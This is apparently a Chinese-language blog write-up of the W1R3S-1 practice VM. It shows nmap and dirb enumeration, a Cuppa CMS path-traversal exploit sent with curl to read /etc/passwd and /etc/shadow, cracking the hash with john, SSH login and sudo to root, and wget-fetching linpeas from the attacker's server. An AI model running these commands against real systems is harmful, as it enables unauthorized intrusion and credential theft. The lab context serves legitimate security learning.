W1R3S-1
|
未分类
|
29

703 字
|
7 分钟
本文最后更新于28 天前,其中的信息可能已经过时,如有错误请发送邮件到1334258945@qq.com

nmap信息枚举

还是先找到靶机ip
用ifconfig看看自己的


发现是192.168.161段。
用nmap扫一下这个段

nmap 192.168.161.0/24 -sP


知道自己的靶机ip了
192.168.161.148

扫描靶机的端口信息

nmap -p- 192.168.161.148


PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
3306/tcp open mysql

靶机端口的详细信息

用nmap的详细命令

nmap -p- 192.168.161.148 -sS -sV -A -T5


发现这些信息

ftp弱口令:
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 content
| drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 docs
|_drwxr-xr-x    2 ftp      ftp          4096 Jan 28  2018 new-employees
22端口开放:
OpenSSH 7.2p2 Ubuntu 4ubuntu2.4
其余信息无!

ftp去看看。

进入ftp看一看

ftp 192.168.161.148

账号直接是anonymous


登陆成功,看一看content里面的内容。


里面有1 2 3个txt文件,直接全下载

get 01.txt
get 02.txt
get 03.txt


docs里面有worktodo.txt也下载

get worktodo.txt


这里面的也下载看看

get employee-names.txt


这是01的,没作用


这是02也没有作用


03也没用

这个是work的那个也没用


这个也没用,也就是说ftp下载的东西都没用。

去80端口去查看


dirb一下

dirb http://192.168.161.148/


查找出该页面存在administrator目录:

http://192.168.161.148/administrator/installation/


发现是TitleCuppa CMS框架!CuppaCMS是一套内容管理系统(CMS)!

谷歌搜索:Cuppa CMS exploit

https://www.exploit-db.com/exploits/25971


所以我们访问这个就行

http://192.168.161.148/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd


发现没有东西,上网查了一下我们这个是get传参,并没法显示内容,所以我们应该用post的传参。
用kali的curl就行

curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.161.148/administrator/alerts/alertConfigField.php

–data-urlencode:
在新版本的CURL中,提供了新的选项 –data-urlencode,通过该选项提供的参数会自动转义特殊字符。


成功。这里并没有我们要找的,我们要找的应该在shadow里面

curl --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.161.148/administrator/alerts/alertConfigField.php


看这个最长的,我们把他保存到一个txt里面。

john爆破

我将那个放在了01.txt文件里面

john 01.txt


得到ssh的账号和密码
账号是w1r3s
密码是computer

ssh登陆

ssh w1r3s@192.168.161.148

密码是computer


成功登陆。


发现用sudo -i然后输入密码就能进入root


我已经完成了这个挑战。

扩展

可以利用脚本直接把他靶机里面的信息全部拿到


利用这个文件就行。
在自己虚拟机开一个http的服务

python -m http.server 8081

在ssh里面

cd /tmp
wget http://192.168.161.142:8081/linpeas.sh
chmod +x linpeas.sh

然后运行

./linpeas.sh


就什么内容都有了,哈哈哈。
这个文件放到文章尾

通过百度网盘分享的文件:linpeas.sh
链接:https://pan.baidu.com/s/1JNkAWmMFKTcCNSI6K4CshQ?pwd=xlvu
提取码:xlvu
–来自百度网盘超级会员V5的分享

文末附加内容
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																

							
							
						

																

							
							
						

										
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇 

                    

                    
			        推荐文章
		            

		            

							
世界,您好!